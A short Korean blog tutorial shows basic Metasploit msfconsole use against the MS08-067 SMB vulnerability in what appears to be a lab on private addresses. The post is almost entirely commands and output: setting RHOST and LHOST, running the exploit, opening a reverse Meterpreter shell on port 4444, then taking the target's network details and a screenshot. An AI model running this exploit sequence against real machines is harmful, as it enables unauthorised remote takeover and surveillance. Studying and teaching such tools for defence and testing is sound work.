[metasploit] msfconsole 기본사용법 (MS08_067)

참고사이트

http://blog.naver.com/ifkiller?Redirect=Log&logNo=70131278273

기본적인 사용방법

msfconsole 실행
#msfconsole

타겟 시스템에 MS08_067 취약점 존재한다는 가정하에..

msf > search ms08_067 Matching Modules ================    Name                                 Disclosure Date          Rank   Description    ----                                 ---------------          ----   -----------    exploit/windows/smb/ms08_067_netapi  2008-10-28 00:00:00 UTC  great  Microsoft Server Service Relative Path Stack Corruption msf > use exploit/windows/smb/ms08_067_netapi msf  exploit(ms08_067_netapi) > set RHOST 192.168.221.157 RHOST => 192.168.221.157 msf  exploit(ms08_067_netapi) > set LHOST 192.168.221.158 LHOST => 192.168.221.158 msf  exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.221.158:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:Korean [*] Selected Target: Windows XP SP2 Korean (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 192.168.221.157 [*] Meterpreter session 2 opened (192.168.221.158:4444 -> 192.168.221.157:1377) at 2012-10-11 13:04:57 +0900 meterpreter > ifconfig Interface  1 ============ Name         : MS TCP Loopback interface Hardware MAC : 00:00:00:00:00:00 MTU          : 1520 IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0 Interface  2 ============ Name         : AMD PCNET Family PCI Ethernet Adapter - ÆÐŶ ½ºÄÉÁÙ·¯ ¹Ì´Ï Æ÷Æ® Hardware MAC : 00:0c:29:cf:07:4d MTU          : 1500 IPv4 Address : 192.168.221.157 IPv4 Netmask : 255.255.255.0 meterpreter > screenshot Screenshot saved to: /root/cMYcJvsk.jpeg /usr/bin/www-browser: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /usr/bin/www-browser) /usr/bin/www-browser: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /usr/bin/www-browser)